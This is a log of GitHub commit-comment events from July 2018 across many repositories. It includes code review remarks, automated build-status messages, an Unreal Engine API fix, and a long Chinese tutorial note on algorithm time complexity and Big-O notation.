{"id":"7973562821","type":"CommitCommentEvent","actor":{"login":"mjmartin00"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29728014,"position":116,"line":155,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-16T23:50:53Z","updated_at":"2018-07-16T23:50:53Z","author_association":"NONE","body":"Is this actually used anywhere?"}},"created_at":"2018-07-16T23:50:53Z"}
{"id":"7973577335","type":"CommitCommentEvent","actor":{"login":"drnic"},"repo":{"name":"cloudfoundry-community/go-uaa"},"payload":{"comment":{"id":29728051,"position":5,"line":60,"path":"api.go","commit_id":"1994bd4b730ec543a7c5fad5c202bd910cbec474","created_at":"2018-07-16T23:56:11Z","updated_at":"2018-07-16T23:56:11Z","author_association":"MEMBER","body":"Can we please move away from skipping SSL validation; and start using custom certs as much as possible?"}},"created_at":"2018-07-16T23:56:11Z"}
{"id":"7973580913","type":"CommitCommentEvent","actor":{"login":"Dionatadm"},"repo":{"name":"PerformanceTesting201801/GURI-Eventos"},"payload":{"comment":{"id":29728061,"position":null,"line":null,"path":null,"commit_id":"43755b6f87051b844ff9c81d1ffebec6b1a687e2","created_at":"2018-07-16T23:57:30Z","updated_at":"2018-07-16T23:57:30Z","author_association":"NONE","body":"Roteiro do Cenário de Teste de: Cadastro de Participantes - Evento (Guri)"}},"created_at":"2018-07-16T23:57:30Z"}
{"id":"7973583369","type":"CommitCommentEvent","actor":{"login":"dsakagi"},"repo":{"name":"jeffesp/dragonpandaclient-py"},"payload":{"comment":{"id":29728063,"position":7,"line":52,"path":"dragonpanda/http_client.py","commit_id":"bf4922315fb87bb13edabc3e2c605b315f2bb77e","created_at":"2018-07-16T23:58:27Z","updated_at":"2018-07-16T23:58:27Z","author_association":"NONE","body":"Moreso as a developer of this lib than as a user, I'd be interested to know what qualifies as an InputError and what qualifies as a ClientError"}},"created_at":"2018-07-16T23:58:27Z"}
{"id":"7973584015","type":"CommitCommentEvent","actor":{"login":"dsakagi"},"repo":{"name":"jeffesp/dragonpandaclient-py"},"payload":{"comment":{"id":29728065,"position":7,"line":52,"path":"dragonpanda/http_client.py","commit_id":"bf4922315fb87bb13edabc3e2c605b315f2bb77e","created_at":"2018-07-16T23:58:42Z","updated_at":"2018-07-16T23:58:42Z","author_association":"NONE","body":"In a docstring of the class itself, is what I mean."}},"created_at":"2018-07-16T23:58:42Z"}
{"id":"7973586982","type":"CommitCommentEvent","actor":{"login":"drnic"},"repo":{"name":"cloudfoundry-incubator/uaa-cli"},"payload":{"comment":{"id":29728070,"position":5,"line":11,"path":"cmd/api_client.go","commit_id":"5e1786a6904446f031678be79480af40ac413e0b","created_at":"2018-07-16T23:59:48Z","updated_at":"2018-07-16T23:59:48Z","author_association":"NONE","body":"Please please don't go down the path of skipping SSL validation.\r\n\r\nInstead, start using custom CA like all other CF/BOSH CLIs. All UAAs deployed by BOSH (is there another way anyone deploys UAA) have a custom root CA that can be passed in to the `uaa` CLI - can we please support this.\r\n\r\nhttps://github.com/cloudfoundry-incubator/uaa-cli/issues/17"}},"created_at":"2018-07-16T23:59:48Z"}
{"id":"7968444912","type":"CommitCommentEvent","actor":{"login":"mezz"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":29715271,"position":null,"line":null,"path":null,"commit_id":"fe3478f233e9b3934ddc80330cb0f333b0a7ea1a","created_at":"2018-07-16T03:01:51Z","updated_at":"2018-07-16T03:01:51Z","author_association":"MEMBER","body":"@bs2609 please see cpw's comment above"}},"created_at":"2018-07-16T03:01:51Z"}
{"id":"7968453423","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29715284,"position":null,"line":null,"path":null,"commit_id":"4acd760c18ce61b0c42244ceee2a316cdc91c437","created_at":"2018-07-16T03:06:37Z","updated_at":"2018-07-16T03:06:37Z","author_association":"NONE","body":"Did you mean to schedule this as [0, 4]?"}},"created_at":"2018-07-16T03:06:37Z"}
{"id":"7968461594","type":"CommitCommentEvent","actor":{"login":"nicklp"},"repo":{"name":"nicklp/htmlDemo"},"payload":{"comment":{"id":29715293,"position":11,"line":11,"path":"index.html","commit_id":"4af1babeda9eac6268f0f37093b4afdf5a6c524c","created_at":"2018-07-16T03:11:08Z","updated_at":"2018-07-16T03:11:08Z","author_association":"OWNER","body":"为什么这个地方需要这个链接呢？"}},"created_at":"2018-07-16T03:11:08Z"}
{"id":"7968463502","type":"CommitCommentEvent","actor":{"login":"mrwright"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29715294,"position":330,"line":330,"path":"rtl/mc/MCPU_MEM_dtlb.v","commit_id":"38947b6b27bb2e3ccbceb15a6d3906125597e896","created_at":"2018-07-16T03:12:10Z","updated_at":"2018-07-16T03:12:10Z","author_association":"MEMBER","body":"This was supposed to determine what gets written to the cache memory... but now that you mention it, I can do away with almost all of this (most of these don't need to be arrays, and only the `we` bits need to depend on the cache update registers--the rest can just be direct assignments)."}},"created_at":"2018-07-16T03:12:10Z"}
{"id":"7968463581","type":"CommitCommentEvent","actor":{"login":"kumika"},"repo":{"name":"kumika/whatever"},"payload":{"comment":{"id":29715295,"position":null,"line":null,"path":null,"commit_id":"96c894286f2e06a5292ce45cdccecc1dbc591d79","created_at":"2018-07-16T03:12:12Z","updated_at":"2018-07-16T03:12:12Z","author_association":"OWNER","body":"1 时间复杂度定义：\r\n\t评估执行程序所需的时间。可以估算出程序对处理器的使用程度。\r\n设计算法时，一般是要先考虑系统环境，然后权衡时间复杂度和空间复杂度，选取一个平衡点。不过，时间复杂度要比空间复杂度更容易产生问题，因此算法研究的主要也是时间复杂度，不特别说明的情况下，复杂度就是指时间复杂度。\r\n\r\n2 时间复杂度：\r\n2.1时间频度：\r\n一个算法执行所耗费的时间，从理论上是不能算出来的，必须上机运行测试才能知道。但我们不可能也没有必要对每个算法都上机测试，只需知道哪个算法花费的时间多，哪个算法花费的时间少就可以了。并且一个算法花费的时间与算法中语句的执行次数成正比例，哪个算法中语句执行次数多，它花费时间就多。一个算法中的语句执行次数称为语句频度或时间频度。记为T(n)。\r\n什么嘛，这里的频度其实就是数学上的指数，然后在实际中，我们是只设定循环判断的输入变量的初始值和判断范围值，输入变量在经过判断后增加数值的指数是机器计算的，现在我们需要人工估算，进行改进。\r\n2.2时间复杂度：\r\n时间频度T(n)中，n称为问题的规模，当n不断变化时，时间频度T(n)也会不断变化。但有时我们想知道它变化时呈现什么规律，为此我们引入时间复杂度的概念。一般情况下，算法中基本操作重复执行的次数是问题规模n的某个函数，用T(n)表示，若有某个辅助函数f(n)，使得当n趋近于无穷大时，T（n)/f(n)的极限值为不等于零的常数，则称f(n)是T(n)的同数量级函数，记作T(n)=O(f(n))，它称为算法的渐进时间复杂度，简称时间复杂度。\r\nT(n) = 循环体运行次数 * （循环体语句频度 + 循环判定语句频度）经验公式？！目前好像感觉不行。先记着\r\n\r\n\r\n3大o表示法：\r\n前面用O( )来体现算法时间复杂度的记法，我们称之为大O表示法。\r\n算法复杂度可以从最理想情况、平均情况和最坏情况三个角度来评估，由于平均情况大多和最坏情况持平，而且评估最坏情况也可以避免后顾之忧，因此一般情况下，我们设计算法时都要直接估算最坏情况的复杂度。 \r\n大O表示法O(f(n)中的f(n)的值可以为1、n、logn、n²等，因此我们可以将O(1)、O(n)、O(logn)、O(n²)分别可以称为常数阶、线性阶、对数阶和平方阶，那么如何推导出f(n)的值呢？我们接着来看推导大O阶的方法。\r\n\r\n3.1推导大O阶 \r\n推导大O阶，我们可以按照如下的规则来进行推导，得到的结果就是大O表示法： \r\n1.用常数1来取代运行时间中所有加法常数。 \r\n2.修改后的运行次数函数中，只保留最高阶项 \r\n3.如果最高阶项存在且不是1，则去除与这个项相乘的常数。\r\n\r\n3.1.1常数阶\r\n  int sum = 0,n = 100; //执行一次  \r\n  sum = (1+n)*n/2; //执行一次  \r\n  System.out.println (sum); //执行一次\r\n\r\n\r\n上面算法的运行的次数的函数为f(n)=3，根据推导大O阶的规则1，我们需要将常数3改为1，则这个算法的时间复杂度为O(1)。如果sum = （1+n）*n/2这条语句再执行10遍，因为这与问题大小n的值并没有关系，所以这个算法的时间复杂度仍旧是O(1)，我们可以称之为常数阶\r\n3.1.2线性阶和立方阶\r\nT(n) 或者f(n)  = 循环体运行次数 * （循环体语句频度 + 循环判定语句频度）\r\n下面的例子判断语句都是加减法，所以算1\r\n例子1 ：\r\nfor(int i=0;i<n;i++){           //循环次数为n\r\nprintf(“faker is mid god!!!”)  //时间复杂度为O(1)的算法\r\n...\r\n}\r\n上面算法循环体中的代码执行了n次，因此时间复杂度为O(n * 1) 即为O(n)。\r\n\r\n例子2 ：\r\n对于多个循环，假设循环体的时间复杂度为 O(n)，各个循环的循环次数分别是a, b, c...，则这个循环的时间复杂度为 O(n×a×b×c...)。分析的时候应该由里向外分析这些循环。\r\nvoid aFunc(int n) {\r\n    for(int i = 0; i < n; i++) {         // 循环次数为 n\r\n        for(int j = 0; j < n; j++) {       // 循环次数为 n\r\n            printf(\"Hello, World!\\n\");      // 循环体时间复杂度为 O(1)\r\n        }\r\n    }\r\n}\r\n此时时间复杂度为 O(n × n × 1)，即 O(n^2)。\r\n\r\n\r\n例子3：对于顺序执行的语句或者算法，总的时间复杂度等于其中最大的时间复杂度\r\nvoid aFunc(int n) {\r\n    // 第一部分时间复杂度为 O(n^2)\r\n    for(int i = 0; i < n; i++) {\r\n        for(int j = 0; j < n; j++) {\r\n            printf(\"Hello, World!\\n\");\r\n        }\r\n    }\r\n    // 第二部分时间复杂度为 O(n)\r\n    for(int j = 0; j < n; j++) {\r\n        printf(\"Hello, World!\\n\");\r\n    }\r\n}\r\n此时时间复杂度为 max(O(n^2), O(n))，即 O(n^2)\r\n\r\n\r\n例子4：对于条件判断语句，总的时间复杂度等于其中 时间复杂度最大的路径 的时间复杂度\r\nvoid aFunc(int n) {\r\n    if (n >= 0) {\r\n        // 第一条路径时间复杂度为 O(n^2)\r\n        for(int i = 0; i < n; i++) {\r\n            for(int j = 0; j < n; j++) {\r\n                printf(\"输入数据大于等于零\\n\");\r\n            }\r\n        }\r\n    } else {\r\n        // 第二条路径时间复杂度为 O(n)\r\n        for(int j = 0; j < n; j++) {\r\n            printf(\"输入数据小于零\\n\");\r\n        }\r\n    }\r\n}\r\n此时时间复杂度为 max(O(n^2), O(n))，即 O(n^2)，\r\n时间复杂度分析的基本策略是：从内向外分析，从最深层开始分析。如果遇到函数调用，要深入函数进行分析。\r\n\r\n\r\n3.1.3对数阶\r\nT(n) 或者f(n)  = 循环体运行次数 * （循环体语句频度 + 循环判定语句频度）\r\n下面例子的判断语句是乘除法，需要进行算出指数，这个指数就是所需要的时间复杂度\r\n麻蛋，几把例子的输入变量都是在循环体内进行更新，有什么意思\r\n例子1：\r\nint number=1;\r\nwhile(number<n){\r\nnumber=number*2;\r\n//时间复杂度为O(1)的算法\r\n...\r\n}\r\n可以看出上面的代码，随着number每次乘以2后，都会越来越接近n，当number不小于n时就会退出循环。假设循环的次数为X，则由2^x=n得出x=log₂n，因此得出这个算法的时间复杂度为O(logn)。\r\n为什么记做O（log n） ？\r\n因为：算法的 T(n) = O(log n)，则称其具有对数时间。由于计算机使用二进制的记数系统，对数常常以10为底（即log10 n，有时写作 lg n）。然而，由对数的换底公式，loga n和 logb n只有一个常数因子不同，这个因子在大O记法中被丢弃。因此记作O(log n)，而不论对数的底是多少，是对数时间算法的标准记法\r\n\r\n另外的解释：假设循环次数为 t，则循环条件满足 2^t < n。\r\n可以得出，执行次数t = log(2)(n)，即 T(n) = log(2)(n)，可见时间复杂度为 O(log(2)(n))，即 O(log n)。\r\n\r\n另外的解释 ：\r\n记得f(n)是辅助函数\r\nnumber=number*2语句频度是f(n),   \r\n则：2^f(n)<=n;      f(n)<=log2n    \r\n取最大值f(n)=log2n,\r\nT(n)=O(log2n )\r\n\r\n3.1.3 其他阶\r\nf(n)=nlogn时，时间复杂度为O(nlogn)，可以称为nlogn阶。 \r\nf(n)=n³时，时间复杂度为O(n³)，可以称为立方阶。 \r\nf(n)=2ⁿ时，时间复杂度为O(2ⁿ)，可以称为指数阶。 \r\nf(n)=n!时，时间复杂度为O(n!)，可以称为阶乘阶。 \r\nf(n)=(√n时，时间复杂度为O(√n)，可以称为平方根阶。\r\n\r\n"}},"created_at":"2018-07-16T03:12:12Z"}
{"id":"7968464209","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29715296,"position":null,"line":null,"path":null,"commit_id":"8c334c4271d857353796d77af0729aa2fe898cea","created_at":"2018-07-16T03:12:32Z","updated_at":"2018-07-16T03:12:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Update destination list](https://trello.com/c/lgWjhOne/10-update-destination-list)"}},"created_at":"2018-07-16T03:12:32Z"}
{"id":"7968467752","type":"CommitCommentEvent","actor":{"login":"DeathViking42"},"repo":{"name":"RFDesign/rfdesign.github.io"},"payload":{"comment":{"id":29715300,"position":null,"line":null,"path":null,"commit_id":"9686084b60f65d4f6af36261148df921e4f81939","created_at":"2018-07-16T03:14:17Z","updated_at":"2018-07-16T03:14:17Z","author_association":"COLLABORATOR","body":"Tools V2.10 upload"}},"created_at":"2018-07-16T03:14:17Z"}
{"id":"7968475744","type":"CommitCommentEvent","actor":{"login":"NanGC"},"repo":{"name":"Yorwxue/Two-Stream-Convolutional-Networks"},"payload":{"comment":{"id":29715307,"position":null,"line":null,"path":null,"commit_id":"1b11c5b3d6025c22f892b425a285231993c0b96f","created_at":"2018-07-16T03:18:33Z","updated_at":"2018-07-16T03:18:33Z","author_association":"NONE","body":"may I ask the dataset you ues?"}},"created_at":"2018-07-16T03:18:33Z"}
{"id":"7968476106","type":"CommitCommentEvent","actor":{"login":"mediocremn"},"repo":{"name":"mediocremn/Background-Colors-Generator"},"payload":{"comment":{"id":29715308,"position":null,"line":null,"path":null,"commit_id":"8b662950698bcf70375952109a11532f31908a7f","created_at":"2018-07-16T03:18:43Z","updated_at":"2018-07-16T03:18:43Z","author_association":"OWNER","body":"Creates different background colors."}},"created_at":"2018-07-16T03:18:43Z"}
{"id":"7968478119","type":"CommitCommentEvent","actor":{"login":"JerryCheng94"},"repo":{"name":"omnirom/android_bootable_recovery"},"payload":{"comment":{"id":29715310,"position":31,"line":244,"path":"tests/component/install_test.cpp","commit_id":"00d5757186c279ba5e8a52a6f5209be3e7152025","created_at":"2018-07-16T03:19:45Z","updated_at":"2018-07-16T03:19:45Z","author_association":"NONE","body":"???"}},"created_at":"2018-07-16T03:19:45Z"}
{"id":"7968479494","type":"CommitCommentEvent","actor":{"login":"odiegosantos"},"repo":{"name":"odiegosantos/odiegosantos.github.io"},"payload":{"comment":{"id":29715313,"position":null,"line":null,"path":null,"commit_id":"f8bdcf3e9bc0e49ffa6403b44cb8e74fb2fe7b33","created_at":"2018-07-16T03:20:29Z","updated_at":"2018-07-16T03:20:29Z","author_association":"OWNER","body":"deigo"}},"created_at":"2018-07-16T03:20:29Z"}
{"id":"7968480481","type":"CommitCommentEvent","actor":{"login":"Bluscream"},"repo":{"name":"alex720/user-manager"},"payload":{"comment":{"id":29715314,"position":32,"line":null,"path":"ConfigData.cpp","commit_id":"0b46dd6456481db55d203654f466ca3a5bd1ff6d","created_at":"2018-07-16T03:20:55Z","updated_at":"2018-07-16T03:20:55Z","author_association":"CONTRIBUTOR","body":"Warum machst du nich einfach nur die eine zeile in das if?"}},"created_at":"2018-07-16T03:20:55Z"}
{"id":"7968482458","type":"CommitCommentEvent","actor":{"login":"Xiodiarch"},"repo":{"name":"UnrealCourse/03_BuildingEscape"},"payload":{"comment":{"id":29715317,"position":null,"line":null,"path":null,"commit_id":"d536503ab795e9e3e0593d431c7ee51ff03deaa4","created_at":"2018-07-16T03:21:57Z","updated_at":"2018-07-16T03:21:57Z","author_association":"NONE","body":"Hello I was wanting to leave a note I am currently using Unreal Engine Version 4.19 and there is a slight change to the API going forward.\r\n\r\nPhysicsHandle->Grab Component is no longer able to build going forward the solution I came up with is as follows.\r\n\r\nif (ActorHit)\r\n\t{\r\n\t\tPhysicsHandle->GrabComponentAtLocationWithRotation(\r\n\t\t\tComponentToGrab,\r\n\t\t\tNAME_None,\r\n\t\t\tActorHit->GetActorLocation(),\r\n\t\t\tActorHit->GetActorRotation()\r\n\t\t);\r\n\t}\r\nthis does however lock the actors rotation that you currently have."}},"created_at":"2018-07-16T03:21:57Z"}
{"id":"7968483133","type":"CommitCommentEvent","actor":{"login":"pedro-roberto"},"repo":{"name":"lightningnetworkstores/lightningnetworkstores.github.io"},"payload":{"comment":{"id":29715318,"position":null,"line":null,"path":null,"commit_id":"c3d0f0e8db9bef2f18fcf28e43f7e6c278db629f","created_at":"2018-07-16T03:22:19Z","updated_at":"2018-07-16T03:22:19Z","author_association":"COLLABORATOR","body":"Hopefully last test commit"}},"created_at":"2018-07-16T03:22:19Z"}
{"id":"7968483225","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29715319,"position":null,"line":null,"path":null,"commit_id":"21ebb1cd54dd19767a2d821d4c92f24f0c72a12c","created_at":"2018-07-16T03:22:22Z","updated_at":"2018-07-16T03:22:22Z","author_association":"MEMBER","body":"@LeoMcA Thought I'll share some changes I made with regards to your commits for learning purposes."}},"created_at":"2018-07-16T03:22:22Z"}
{"id":"7968484634","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29715320,"position":82,"line":82,"path":"test/javascripts/acceptance/admin-user-emails-test.js.es6","commit_id":"21ebb1cd54dd19767a2d821d4c92f24f0c72a12c","created_at":"2018-07-16T03:23:01Z","updated_at":"2018-07-16T03:23:01Z","author_association":"MEMBER","body":"We now prefer the `async await` way of writing tests. This will allow us to do away with all the `andThen()`s which sometimes make debugging hard. "}},"created_at":"2018-07-16T03:23:01Z"}
{"id":"7968485406","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29715323,"position":4,"line":149,"path":"app/controllers/users_controller.rb","commit_id":"21ebb1cd54dd19767a2d821d4c92f24f0c72a12c","created_at":"2018-07-16T03:23:23Z","updated_at":"2018-07-16T03:23:23Z","author_association":"MEMBER","body":"Instead of two database queries, I rewrote this to do this in one. "}},"created_at":"2018-07-16T03:23:23Z"}
{"id":"7968485520","type":"CommitCommentEvent","actor":{"login":"yamashia"},"repo":{"name":"yamashia/yamashia"},"payload":{"comment":{"id":29715324,"position":5,"line":5,"path":"yamashia/BuisinessInfo.html","commit_id":"26b92ec362765418e01db3f3a36333fa63ea8ef8","created_at":"2018-07-16T03:23:27Z","updated_at":"2018-07-16T03:23:27Z","author_association":"OWNER","body":"→株式会社ヤマシアに変更お願いいたします。"}},"created_at":"2018-07-16T03:23:27Z"}
{"id":"7968486121","type":"CommitCommentEvent","actor":{"login":"yamashia"},"repo":{"name":"yamashia/yamashia"},"payload":{"comment":{"id":29715327,"position":5,"line":5,"path":"yamashia/CompanyBrochure.html","commit_id":"26b92ec362765418e01db3f3a36333fa63ea8ef8","created_at":"2018-07-16T03:23:45Z","updated_at":"2018-07-16T03:23:45Z","author_association":"OWNER","body":"→株式会社ヤマシアに変更お願いいたします。"}},"created_at":"2018-07-16T03:23:45Z"}
{"id":"7968497765","type":"CommitCommentEvent","actor":{"login":"soumyasb"},"repo":{"name":"soumyasb/sample2"},"payload":{"comment":{"id":29715338,"position":19,"line":26,"path":"krishna/Search.js","commit_id":"ab0957651698a1e5c4264c3613586bb9d22e9466","created_at":"2018-07-16T03:30:00Z","updated_at":"2018-07-16T03:30:00Z","author_association":"OWNER","body":"const searchText =  nextProps.match.params.searchText || '';"}},"created_at":"2018-07-16T03:30:00Z"}
{"id":"7968498438","type":"CommitCommentEvent","actor":{"login":"cnlohr"},"repo":{"name":"cnlohr/cnping"},"payload":{"comment":{"id":29715343,"position":null,"line":null,"path":null,"commit_id":"67bf9b73eefe1de63bed8608e7cb79250bea5f3d","created_at":"2018-07-16T03:30:19Z","updated_at":"2018-07-16T03:30:19Z","author_association":"OWNER","body":"aah probably a bug?  I wonder how one could chase that down...  That's very cool that you can see the repeated GCC string.  No idea why that's so frequent.  I don't think I've ever looked at the binary of cnping.exe.  It looks like it should be possible to crush it further.  I am not sure why \"strip\" can't strip out that version information."}},"created_at":"2018-07-16T03:30:19Z"}
{"id":"7968502028","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715345,"position":null,"line":null,"path":null,"commit_id":"2a1b3958d08672cddc4b745912fa6a66ed2c62f4","created_at":"2018-07-16T03:32:12Z","updated_at":"2018-07-16T03:32:12Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 513](https://ci.hashicorp.engineering/viewLog.html?buildId=104058&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T03:32:12Z"}
{"id":"7968502545","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"jonaschen/system-sw-qemu-vexpress"},"payload":{"comment":{"id":29715346,"position":4,"line":9,"path":"README.md","commit_id":"bad6a34696fd0cd4a3c08e3553583a838c1a99b4","created_at":"2018-07-16T03:32:29Z","updated_at":"2018-07-16T03:32:29Z","author_association":"NONE","body":"It sounds promising. I look forward to your progress."}},"created_at":"2018-07-16T03:32:29Z"}
{"id":"7968502854","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715347,"position":null,"line":null,"path":null,"commit_id":"2a1b3958d08672cddc4b745912fa6a66ed2c62f4","created_at":"2018-07-16T03:32:39Z","updated_at":"2018-07-16T03:32:39Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 513](https://ci.hashicorp.engineering/viewLog.html?buildId=104058&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:27"}},"created_at":"2018-07-16T03:32:39Z"}
{"id":"7968507920","type":"CommitCommentEvent","actor":{"login":"nsgoyat"},"repo":{"name":"VirtuBox/nginx-ee"},"payload":{"comment":{"id":29715356,"position":null,"line":null,"path":null,"commit_id":"735de3b95c0fc86b00a1657273da9b378bc283e9","created_at":"2018-07-16T03:35:28Z","updated_at":"2018-07-16T03:35:28Z","author_association":"NONE","body":"Thanks a ton for your dedication and contribution to the EE development Master. It will be great to see this patch in work with your script. Waiting....."}},"created_at":"2018-07-16T03:35:28Z"}
{"id":"7968511928","type":"CommitCommentEvent","actor":{"login":"Aaron1011"},"repo":{"name":"randombyte-developer/entity-particles"},"payload":{"comment":{"id":29715359,"position":25,"line":34,"path":"build.gradle","commit_id":"df30977eee89fe32fdb8abb279a54bf9fdf8c6c1","created_at":"2018-07-16T03:37:37Z","updated_at":"2018-07-16T03:37:37Z","author_association":"NONE","body":"Was this intentional? Wouldn't it be easier to rename the package at the source level?"}},"created_at":"2018-07-16T03:37:37Z"}
{"id":"7968512864","type":"CommitCommentEvent","actor":{"login":"yangmqCM"},"repo":{"name":"yangmqCM/php-up-down"},"payload":{"comment":{"id":29715361,"position":null,"line":null,"path":null,"commit_id":"a4c3fd96efb193734036d1f53dd6b4ed7e2e7921","created_at":"2018-07-16T03:38:10Z","updated_at":"2018-07-16T03:38:10Z","author_association":"OWNER","body":"县城vd**县城不定时大幅度**"}},"created_at":"2018-07-16T03:38:10Z"}
{"id":"7968514792","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715364,"position":null,"line":null,"path":null,"commit_id":"9f799cc3ed8476d01d137f7b9af28299cf87252d","created_at":"2018-07-16T03:39:15Z","updated_at":"2018-07-16T03:39:15Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 514](https://ci.hashicorp.engineering/viewLog.html?buildId=104059&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T03:39:15Z"}
{"id":"7968515481","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715365,"position":null,"line":null,"path":null,"commit_id":"9f799cc3ed8476d01d137f7b9af28299cf87252d","created_at":"2018-07-16T03:39:38Z","updated_at":"2018-07-16T03:39:38Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 514](https://ci.hashicorp.engineering/viewLog.html?buildId=104059&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:22"}},"created_at":"2018-07-16T03:39:38Z"}
{"id":"7968515502","type":"CommitCommentEvent","actor":{"login":"zhangcanhui"},"repo":{"name":"zhangcanhui/test"},"payload":{"comment":{"id":29715366,"position":null,"line":null,"path":null,"commit_id":"8764808fdd481623d4f493816557e67fd00e852e","created_at":"2018-07-16T03:39:39Z","updated_at":"2018-07-16T03:39:39Z","author_association":"OWNER","body":"xiugai"}},"created_at":"2018-07-16T03:39:39Z"}
{"id":"7968520022","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29715371,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-16T03:42:03Z","updated_at":"2018-07-16T03:42:03Z","author_association":"NONE","body":"@MarkoTotti Have you seeded the db with birthdates? How were these entries populated? Without seeing your model and controller and/or seeing your migrations, this will be difficult to assess."}},"created_at":"2018-07-16T03:42:03Z"}
{"id":"7968520963","type":"CommitCommentEvent","actor":{"login":"Nebulis"},"repo":{"name":"GovTechSG/mcf-boilerplate-js"},"payload":{"comment":{"id":29715374,"position":34,"line":34,"path":"packages/server-boilerplate-middleware/src/logging/server-logging.js","commit_id":"a3f193f305bcd65889f57404721984b80829c39c","created_at":"2018-07-16T03:42:32Z","updated_at":"2018-07-16T03:42:32Z","author_association":"COLLABORATOR","body":"have a look on tests to avoid this"}},"created_at":"2018-07-16T03:42:32Z"}
{"id":"7968522855","type":"CommitCommentEvent","actor":{"login":"tko22"},"repo":{"name":"hack4impact-uiuc/h4i-recruitment"},"payload":{"comment":{"id":29715377,"position":null,"line":null,"path":null,"commit_id":"cced9497b5e54cb2cb00eaffc86fabe901fb45e7","created_at":"2018-07-16T03:43:33Z","updated_at":"2018-07-16T03:43:33Z","author_association":"MEMBER","body":"next time, branch off of master and make a PR :)"}},"created_at":"2018-07-16T03:43:33Z"}
{"id":"7968527283","type":"CommitCommentEvent","actor":{"login":"Foolmouse"},"repo":{"name":"zzhoujay/RichText"},"payload":{"comment":{"id":29715383,"position":28,"line":39,"path":"README.md","commit_id":"733cf84fa65dc37372d37627f8dd7a6e5fa0105d","created_at":"2018-07-16T03:46:00Z","updated_at":"2018-07-16T03:46:00Z","author_association":"NONE","body":"**### 搞基 \r\n\r\n> 阿斯顿发送到飞\r\n\r\n搞基 阿斯顿发送到飞**"}},"created_at":"2018-07-16T03:46:00Z"}
{"id":"7968530051","type":"CommitCommentEvent","actor":{"login":"IanByun"},"repo":{"name":"Anduh/ArcaneGen"},"payload":{"comment":{"id":29715385,"position":null,"line":null,"path":null,"commit_id":"a858f595cd934e5ce90f8e8c9232e74549cadda9","created_at":"2018-07-16T03:47:30Z","updated_at":"2018-07-16T03:47:30Z","author_association":"NONE","body":"Haha, hilarious"}},"created_at":"2018-07-16T03:47:30Z"}
{"id":"7968532447","type":"CommitCommentEvent","actor":{"login":"backslash112"},"repo":{"name":"globalchat-online/globalchat-angular"},"payload":{"comment":{"id":29715388,"position":null,"line":null,"path":null,"commit_id":"62e5744ad856c47b6adb9889e291110adc507d62","created_at":"2018-07-16T03:48:45Z","updated_at":"2018-07-16T03:48:45Z","author_association":"COLLABORATOR","body":"Maybe Redux is a better solution for this situation."}},"created_at":"2018-07-16T03:48:45Z"}
{"id":"7968535572","type":"CommitCommentEvent","actor":{"login":"abdourahimjallow"},"repo":{"name":"web-platform-tests/wpt"},"payload":{"comment":{"id":29715391,"position":12,"line":49,"path":"fetch/http-cache/http-cache.js","commit_id":"78da8b60c8d9ff70f64fe48a48290e7ad8155b2b","created_at":"2018-07-16T03:50:28Z","updated_at":"2018-07-16T03:50:28Z","author_association":"NONE","body":"What is 6095 mean"}},"created_at":"2018-07-16T03:50:28Z"}
{"id":"7968538793","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715394,"position":null,"line":null,"path":null,"commit_id":"22cbbf0743ee85ac875b3bb2d84600d3e2535cd0","created_at":"2018-07-16T03:52:17Z","updated_at":"2018-07-16T03:52:17Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 515](https://ci.hashicorp.engineering/viewLog.html?buildId=104060&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T03:52:17Z"}
